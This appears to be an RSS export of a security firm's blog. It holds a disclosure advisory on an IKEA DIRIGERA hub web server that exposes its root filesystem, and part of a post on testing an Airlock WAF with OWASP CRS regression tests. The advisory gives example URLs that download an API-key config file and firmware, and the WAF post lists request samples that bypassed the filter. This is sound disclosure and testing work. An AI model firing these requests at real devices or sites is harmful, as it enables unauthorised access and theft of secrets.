<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="../../assets/xml/rss.xsl" media="all"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Pentagrid AG (Posts about Pentesting)</title><link>https://www.pentagrid.ch/</link><description></description><atom:link href="https://www.pentagrid.ch/en/categories/pentesting.xml" rel="self" type="application/rss+xml"></atom:link><language>en</language><copyright>Contents © 2026 Pentagrid AG </copyright><lastBuildDate>Wed, 17 Jun 2026 19:14:51 GMT</lastBuildDate><generator>Nikola (getnikola.com)</generator><docs>http://blogs.law.harvard.edu/tech/rss</docs><item><title>Security misconfiguration in IKEA DIRIGERA smart hub web server exposes large parts of the root filesystem (GCVE-2342-2026-1)</title><link>https://www.pentagrid.ch/en/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/default_preview_image.jpeg"&gt;&lt;/figure&gt; &lt;p&gt;IKEA produces smart home devices and their newest generation uses the central &lt;a class="reference external" href="https://www.ikea.com/us/en/p/dirigera-hub-for-smart-products-white-smart-50503414/"&gt;DIRIGERA smart hub&lt;/a&gt;. After extracting the firmware, we started hunting for vulnerabilities of the device and found: An unauthenticated attacker on the network can download large parts of the files from the DIRIGERA hub root filesystem. This affects files that are accessible to the service user &lt;cite&gt;license-server&lt;/cite&gt;. These include binaries, firmware files, API keys and in general a lot of proprietary code written by Inter IKEA Systems.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2026-03-18: Vulnerability was discovered.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-03-19: Tried to identify security contacts by checking IKEAS's security.txt, their GPG key and the web. The available online form for submissions was incompatible with Pentagrid's disclosure policy. Tried to contact &lt;a class="reference external" href="mailto:security@ikea.com"&gt;security@ikea.com&lt;/a&gt; by guessing the address, but the e-mail was bounced. Tried to reach out to IKEA via Linkedin and got afterwards contacted by Inter IKEA Systems.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-03-23: IKEA confirms they are handling the security reports. Pentagrid sends a draft of this advisory.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-03-26: Pentagrid contacts IKEA for a status update. IKEA confirms they are still triaging the issue.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-04-29: Pentagrid contacts IKEA for a status update.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-05-04: IKEA sends an update: The issue was a duplicate and reported shortly before Pentagrid's submission on Hackerone. A fix was released to production in the 2.934.1 release, which was released on 2026-04-09. The fix removes the license-server component from the build and that functionality has been reworked to be handled elsewhere outside of the hub. Pentagrid asks if disclosure could happen already. IKEA responds with with a list of questions regarding the disclosure.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-05-06: Pentagrid responds to the list of questions and provides an early draft of this blog post.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-05-13: Pentagrid asked for an update.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-05-27: IKEA agrees that the provided answers/blog post draft are in order with them and Pentagrid can proceed as planned.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-06-17: 90 days disclosure deadline and publication.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="unauthenticated-file-download-via-licensing-server"&gt;
&lt;h2&gt;Unauthenticated file download via licensing server&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N, 5.8 Medium&lt;/pre&gt;
&lt;section id="affected-components"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;The affected component is the IKEA DIRIGERA smart home hub created by Inter IKEA Systems. The device runs a busybox httpd web server on TCP port 8082, which runs as a systemd service under user &lt;cite&gt;license-server&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;An initial firmware dump prior to the update showed the version information below. The system remained vulnerable after an update to a new firmware on 2026-03-18.&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_328e9d5973244adcb2132cd4d75100ae-1" name="rest_code_328e9d5973244adcb2132cd4d75100ae-1" href="https://www.pentagrid.ch/en/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_328e9d5973244adcb2132cd4d75100ae-1"&gt;&lt;/a&gt;[HomeSmart/Bootchain : 2.556]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_284163d51fd54307bb5aa80e21b389f7-1" name="rest_code_284163d51fd54307bb5aa80e21b389f7-1" href="https://www.pentagrid.ch/en/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_284163d51fd54307bb5aa80e21b389f7-1"&gt;&lt;/a&gt;/etc/version
&lt;a id="rest_code_284163d51fd54307bb5aa80e21b389f7-2" name="rest_code_284163d51fd54307bb5aa80e21b389f7-2" href="https://www.pentagrid.ch/en/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_284163d51fd54307bb5aa80e21b389f7-2"&gt;&lt;/a&gt;20180309123456
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The vulnerability was fixed in version 2.934.1.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="summary"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;An unauthenticated attacker on the network can download many files from the DIRIGERA hub root filesystem. The files must be accessible to the Linux user &lt;cite&gt;license-server&lt;/cite&gt;. These include binaries, firmware files, API keys as well as proprietary code written by Inter IKEA Systems.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;During the analysis Pentagrid was able to download 9639 files from 3149 folders from the embedded device's filesystem over the network without any authentication. These files include:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;cite&gt;/usr/share/config/platform/data/settings.json&lt;/cite&gt; which includes the API key that is the same for two analysed DIRIGERA hubs.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;cite&gt;/boot/m4-firmware&lt;/cite&gt; which is assumed to be the Cortex M4 firmware.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Most binaries files -- here it becomes apparent that busybox is used since most of &lt;cite&gt;/bin/*&lt;/cite&gt; binaries return the same (busybox) file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Configurations of services such as the vulnerable &lt;cite&gt;/lib/systemd/system/license-server.service&lt;/cite&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Intellectual property of Inter IKEA Systems B.V., e.g. shell code of &lt;cite&gt;/usr/sbin/boot-complete.sh&lt;/cite&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Operational parameters that are stored in &lt;cite&gt;/usr/share/{factory, config, persist}&lt;/cite&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The usage of systemd service hardening, the usage of the &lt;a class="reference external" href="https://www.st.com/en/secure-mcus/authentication.html"&gt;STSAFE&lt;/a&gt; enviroment, and proper Linux user permissions limits the impact. To the best of our knowledge no client specific cryptographic material is exposed to the network. What is assumed to be the client certificate under &lt;cite&gt;/usr/local/gw/datad/certs/cert_datacloud.crt&lt;/cite&gt; is not accessible and would further require the protected STSAFE secret for the also inaccessible &lt;cite&gt;/usr/local/gw/datad/certs/key_datacloud.key&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;The extracted files expose configurations, intellectual property, proprietary software, and firmware of the Ikea DIRIGERA hub, such as the vulnerabilities of the license server that is exploited here. The impact of exposed software versions is considered insignificant since the license server gives a comprehensive overview about the used software and versions regardless.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;The vulnerability originates from the misconfigured systemd service: &lt;cite&gt;/lib/systemd/system/license-server.service&lt;/cite&gt;. It serves a httpd server on port 8082 with a configuration file under &lt;cite&gt;/usr/share/common-licenses/httpd.conf&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;Excerpt from file &lt;cite&gt;license-server.service&lt;/cite&gt;:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_130e12ea9c824096aa3423f398bab2a9-1" name="rest_code_130e12ea9c824096aa3423f398bab2a9-1" href="https://www.pentagrid.ch/en/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_130e12ea9c824096aa3423f398bab2a9-1"&gt;&lt;/a&gt;ExecStart=httpd -f -p 8082 -c /usr/share/common-licenses/httpd.conf
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Excerpt from file &lt;cite&gt;httpd.conf&lt;/cite&gt;:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_2e944694fde64cecb1940087acf7e71a-1" name="rest_code_2e944694fde64cecb1940087acf7e71a-1" href="https://www.pentagrid.ch/en/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_2e944694fde64cecb1940087acf7e71a-1"&gt;&lt;/a&gt;I:/usr/share/common-licenses/license_summary.txt
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;cite&gt;/usr/share/common-licenses/license_summary.txt&lt;/cite&gt; includes all the licensing information of the software running on the DIRIGERA hub. This file is the only content that is intended to be accessible via the web endpoint.&lt;/p&gt;
&lt;p&gt;Yet, if an unauthroized user visits the endpoint and appends any file system path to the base URL, the webserver returns the file contents or starts a file download, e.g.:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/usr/share/config/platform/data/settings.json"&gt;http://dirigera.example.local:8082/usr/share/config/platform/data/settings.json&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/opt/nexus/bin/chipd"&gt;http://dirigera.example.local:8082/opt/nexus/bin/chipd&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/usr/lib/libicudata.so.71.1"&gt;http://dirigera.example.local:8082/usr/lib/libicudata.so.71.1&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/bin/ls"&gt;http://dirigera.example.local:8082/bin/ls&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/boot/m4-firmware"&gt;http://dirigera.example.local:8082/boot/m4-firmware&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;cite&gt;dirigera.example.local&lt;/cite&gt; is here the hostname of the DIRIGERA hub.&lt;/p&gt;
&lt;p&gt;The webserver serves these additional files due to a non-specified home directory in a busybox httpd service. The &lt;cite&gt;httpd&lt;/cite&gt; call inside the systemd service does not specify the &lt;cite&gt;-h&lt;/cite&gt; parameter (home/server root directory). Further, the configuration file &lt;cite&gt;/usr/share/common-licenses/httpd.conf&lt;/cite&gt; only specifies the index file via tag &lt;cite&gt;I:&lt;/cite&gt; but also does not specifiy the home directory using the tag &lt;cite&gt;H:&lt;/cite&gt; (called server root in the &lt;a class="reference external" href="https://github.com/mirror/busybox/blob/371fe9f71d445d18be28c82a2a6d82115c8af19d/networking/httpd.c#L41"&gt;configuration file&lt;/a&gt;). As a result, the webserver defaults to the current directory as the root directory of the webserver which is also the root directory of the entire file system (&lt;cite&gt;/&lt;/cite&gt;).&lt;/p&gt;
&lt;p&gt;All accessible files return status code 200. To identify existing folders they must be called without the tailing &lt;cite&gt;/&lt;/cite&gt;, e.g. send GET request to &lt;a class="reference external" href="http://dirigera.example.local:8082/usr/share/persist/tee"&gt;http://dirigera.example.local:8082/usr/share/persist/tee&lt;/a&gt; to get status code "302 Found" and a location reference to &lt;cite&gt;/usr/share/persist/tee/&lt;/cite&gt;. Directly requesting &lt;cite&gt;/usr/share/persist/tee/&lt;/cite&gt; results in status code "404 Not Found", which does not provide information to discriminate folder existence. Note, that besides the information gained from the files, attackers can gain additional information about the file system's structure by checking if a folder exists and is accessible: e.g. &lt;cite&gt;/usr/share/persist/tee/&lt;/cite&gt; is known to exist even though all files inside the folder are inaccessible.&lt;/p&gt;
&lt;p&gt;To scrape all 12788 files and directories, Pentagrid used a preconfigured wordlist based on the extracted firmware from another DIRIGERA hub. The total number of accessible entities is a lower (but confirmed) limit since crawling the licence endpoint/filesystem was done based on a non-comprehensive wordlist. The crawling wordlist included only known paths from partitions 9, 10, 11, 13, 14, 15, 16, 17, 18, and 20 of the emmc flash with partitions 15, 16/17, and 18/19 mounted under &lt;cite&gt;/usr/share/{factory, config, persist}&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;The system tries to limit access with systemd service hardening, especially the &lt;cite&gt;InaccessiblePaths&lt;/cite&gt; setting in combination with the Linux user permissions — although this is not sufficient, it prevents further exploitation.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs access to TCP port 8082 of the IKEA DIRIGERA smart hub. Prior knowledge of the filesystem structure is not necessary but can reduce the time required to scrape the entire contents of the filesystem. A version before the 2.934.1 release has to be installed.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="recommendation"&gt;
&lt;h3&gt;Recommendation&lt;/h3&gt;
&lt;p&gt;Install firmware version 2.934.1 released on 2026-04-09 or a later one. The fix removes the license-server component from the build and the functionality has been reworked to be handled elsewhere outside of the hub.&lt;/p&gt;
&lt;p&gt;If you are using busybox httpd in a similar scenario, it is recommended to:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;provide a "Home directory" to httpd by via command line or configuration file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;establish an allowlist to only expose the intended files. Beware, that busybox httpd config files are far more limited in their capabilities to restrict file access compared to their non-busybox alternative.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;apply additional systemd service hardening.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;not solely rely on systemd service denylisting with &lt;cite&gt;InaccessiblePaths&lt;/cite&gt; to administer the served content as denylisting is bad practise for access control.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h3&gt;Credits&lt;/h3&gt;
&lt;p&gt;This vulnerability was discovered by Yannic 'toxsos' Hemmer (Pentagrid).&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;</description><category>Advisory</category><category>Embedded device</category><category>OWASP</category><category>Pentesting</category><category>Web</category><guid>https://www.pentagrid.ch/en/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/</guid><pubDate>Wed, 17 Jun 2026 13:42:00 GMT</pubDate></item><item><title>An excursion into Airlock WAF ruleset testing</title><link>https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/default_preview_image.jpeg"&gt;&lt;/figure&gt; &lt;p&gt;Recently we've been tasked to do an analysis of a web application firewall (WAF) of the vendor Ergon, namely the &lt;a class="reference external" href="https://www.airlock.com/"&gt;Airlock WAF&lt;/a&gt; regarding the effectivness of filtering. One idea was to see what happens when OWASP Core Rule Set (CRS) tests are run against it. This is the story of how we approached this, which payloads went through and how impossible it is to tell if that's good or bad now.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;WAFs are a controversial topic. The reason is simply that there is no technical proof that either is universally helpful or harmful, as their effectiveness largely depends on a lot of things. We don't think you need a WAF in general, and we also don't think you need to get rid of your WAF if you have a use case. For all of you who are expecting us to provide the ultimate answer &lt;a class="brackets" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#footnote-1" id="footnote-reference-1" role="doc-noteref"&gt;&lt;span class="fn-bracket"&gt;[&lt;/span&gt;1&lt;span class="fn-bracket"&gt;]&lt;/span&gt;&lt;/a&gt; in this blog post: You can stop reading here. For everyone interested in learning some technical details about two WAF-related projects from real-world installations, please enjoy.&lt;/p&gt;
&lt;section id="about-wafs-and-airlock"&gt;
&lt;h2&gt;About WAFs and Airlock&lt;/h2&gt;
&lt;p&gt;Ergon's Airlock WAF is one of the better-known WAFs in Switzerland. One reason for this is that it is often recommended, bundled or sold with financial software, such as core banking systems. Some banks nevertheless use something else, while others stick with Airlock. Like any other WAF, Airlock mitigates risks according to their website.&lt;/p&gt;
&lt;p&gt;Like a standard firewall, a WAF has a set of rules that define wether something is blocked or allowed through. However, that's already where the similarity stops. Best practices for regular firewalls require you to create an allow-list of traffic you want to pass and deny everything else. By contrast, most WAFs use block-lists and allow everything else. Everybody in our industry knows block-lists are a recipe for security issues and that's why a WAF will never be perfect, but best effort. So as a matter of fact, WAF bypasses are a common thing.&lt;/p&gt;
&lt;p&gt;While every vendor and company using a WAF has their own rule set to fit their purpose, a key distinction exists: some who use a modified version of the &lt;a class="reference external" href="https://owasp.org/www-project-modsecurity-core-rule-set/"&gt;OWASP ModSecurity Core Rule Set (CRS)&lt;/a&gt;, while others don't use CRS at all. According to the CRS project, a lot of big cloud vendors are using CRS in their WAF. However, Airlock is one of the vendors that doesn't use CRS.&lt;/p&gt;
&lt;p&gt;Additionally, most WAFs allow to decide dynamically whether to use more or less strict rules for a certain category of attacks. CRS uses the term &lt;a class="reference external" href="https://coreruleset.org/docs/concepts/paranoia_levels/"&gt;"Paranoia Level" (1 to 4)&lt;/a&gt;, whereas Airlock calls it &lt;a class="reference external" href="https://docs.airlock.com/gateway/8.0/#data/1583435052416.html"&gt;"Security Level" or "Blocking Level" (basic, standard and strict)&lt;/a&gt;. As some might already have noticed, we'll sometimes refer to CRS as a WAF in this post, implying a compatible WAF engine like ModSecurity is using CRS.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="approach"&gt;
&lt;h2&gt;Approach&lt;/h2&gt;
&lt;p&gt;We've been tasked with analyzing an Airlock WAF and while we looked at various things, as a novel approach, we also decided to try to run comparison tests for Airlock against some of the CRS rules. As there seemed no one who did this before and wrote about it on the Internet, we tried our luck.&lt;/p&gt;
&lt;p&gt;Although there is a &lt;a class="reference external" href="https://docs.airlock.com/gateway/8.0/#data/1589475703024.html"&gt;public list of rule names&lt;/a&gt;, you need access to an Airlock WAF in order to see the actual Airlock rules (the regexes). Whereas CRS is an open-source project and you have full access to review it. This is very helpful for a pentester who is up against a CRS-based WAF, as you can even &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/labels/%3Aheavy_minus_sign%3A%20False%20Negative%20-%20Evasion"&gt;look up all currently unfixed evasions on GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The Airlock WAF we were facing had the following rules and blocking levels set:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Standard: SQL Injection (SQLi) in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: SOL Injection (SQLi) in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Cross-Site Scripting (XSS) in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Cross-Site Scripting (XSS) in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Cross-Site Scripting (XSS) in Path&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Template and Expression Language Injection&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTML Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTML Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTML Injection in Path&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: UNIX Command Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: UNIX Command Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Windows Command Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Windows Command injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: LDAP Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: LDAP Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: PHP Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: PHP Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Object Graph Navigation Library (OGNL) injection (Apache Struts)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Insecure Direct Object Reference in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Insecure Direct Object Reference in Path&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: NoSOL Injection in Parameter Name&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: NoSOL Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: NoSQL Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Parameter Name Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Parameter Value Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Header Name Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Header Value Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Path Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Encoding and Conversion Exploits in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Encoding and Conversion Exploits in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTTP Response Splitting&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTTP Parameter Pollution&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Miscellanous Exploits&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Automated Scanning&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note that none of the rules are on the level "basic", so either the "standard" setting is used or even the highest protection level "strict".&lt;/p&gt;
&lt;/section&gt;
&lt;section id="crs-regression-test-run-against-airlock"&gt;
&lt;h2&gt;CRS regression test run against Airlock&lt;/h2&gt;
&lt;p&gt;The most interesting part for us was that the CRS project provides a &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/tree/main/tests/regression"&gt;full regression test set&lt;/a&gt;, which contains tests that trigger a rule in different ways. With some modifications, such as changing the target host, we were able to run these tests against the Airlock WAF. Although this approach seemed straightforward, we underestimated the amount of manual work required to determine whether a failed test result for CRS was really "an issue" for the Airlock WAF. That's why we didn't completely review the entire regression corpus. However, we still learned a lot of interesting facts about both WAFs, as you'll see.&lt;/p&gt;
&lt;p&gt;In the end, the effectiveness of a WAF depends a lot on its configuration (there are many features we don't even mention here) and on the type of application it is protecting. So even before starting, we knew the results wouldn't show a generally applicable picture.&lt;/p&gt;
&lt;p&gt;After tweaking the configuration of &lt;a class="reference external" href="https://github.com/coreruleset/go-ftw/releases"&gt;go-ftw&lt;/a&gt; (a framework for testing WAFs), and trying to run it against Airlock, it became obvious that this was going to involve a lot of manual work to figure out which things were really a problem on the Airlock side. Some of the reasons are:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;As we had to overwrite the destination (IP address and TCP port) as well as the HTTP Host header of tests to route our request correctly to the Airlock WAF, we already destroyed some of the CRS regression tests that injected into the HTTP Host header.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;There is no throttle mechanism in go-ftw and Airlock was configured to block an IP for a certain time if a threshold of blocked requests per minute was detected. Therefore, we split the test into smaller batches and waited for a while between each batch. When just a few of the test requests were blocked, the batches went through nicely, but for tests that resulted in many blocked requests, we had to rerun them. Fortunately for us, in this particular configuration, it was easy to detect in the HTTP responses when the Airlock WAF blocked our IP address.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Airlock has an allow-list regex of all HTTP header names that are forwarded to applications. If you inject into any HTTP header that is not on the allow-list, the request will never be blocked. Some of the CRS tests injected into custom HTTP headers and therefore never triggered any rule.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Airlock also has an allow-list regex of HTTP cookie names where the same issue applies.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;While CRS checks for certain patterns generically in all parameters, Airlock seems to check for certain things only when these parameters are defined to have that kind of content. For example, XML External Entity (XXE) attacks are not blocked generically in a parameter in Airlock.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Some CRS tests check for false positives (meaning CRS should not block them), but we were not interested in those, as we wanted to see what we could potentially smuggle past the Airlock WAF that CRS blocks.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="crs-regression-test-run-results"&gt;
&lt;h2&gt;CRS regression test run results&lt;/h2&gt;
&lt;p&gt;Here's a list of CRS test results that were passed through and were not blocked by the Airlock WAF under test (mid 2024), but would be blocked at some of the paranoia levels of the CRS. As said earlier, this list is incomplete as we didn't look at all the results of the CRS regression tests manually. The titles are the category titles by CRS.&lt;/p&gt;
&lt;section id="request-913-scanner-detection"&gt;
&lt;h3&gt;REQUEST-913-SCANNER-DETECTION&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_d7e367b989164c97976cfa426b84368e-1" name="rest_code_d7e367b989164c97976cfa426b84368e-1" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_d7e367b989164c97976cfa426b84368e-1"&gt;&lt;/a&gt;User-Agent: nuclei
&lt;a id="rest_code_d7e367b989164c97976cfa426b84368e-2" name="rest_code_d7e367b989164c97976cfa426b84368e-2" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_d7e367b989164c97976cfa426b84368e-2"&gt;&lt;/a&gt;User-Agent: urlgrabber/3.10 yum/3.4.3
&lt;a id="rest_code_d7e367b989164c97976cfa426b84368e-3" name="rest_code_d7e367b989164c97976cfa426b84368e-3" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_d7e367b989164c97976cfa426b84368e-3"&gt;&lt;/a&gt;User-Agent: Mozilla/5.0 zgrab/0.x
&lt;a id="rest_code_d7e367b989164c97976cfa426b84368e-4" name="rest_code_d7e367b989164c97976cfa426b84368e-4" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_d7e367b989164c97976cfa426b84368e-4"&gt;&lt;/a&gt;User-Agent: mozilla/5.0 ecairn-grabber/1.0 (+http://ecairn.com/grabber)
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-920-protocol-enforcement"&gt;
&lt;h3&gt;REQUEST-920-PROTOCOL-ENFORCEMENT&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_17a75ecb6d5646c5a4f453cbb0fdcfc3-1" name="rest_code_17a75ecb6d5646c5a4f453cbb0fdcfc3-1" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_17a75ecb6d5646c5a4f453cbb0fdcfc3-1"&gt;&lt;/a&gt;GET /?param=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34 HTTP/1.1
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-921-protocol-attack"&gt;
&lt;h3&gt;REQUEST-921-PROTOCOL-ATTACK&lt;/h3&gt;
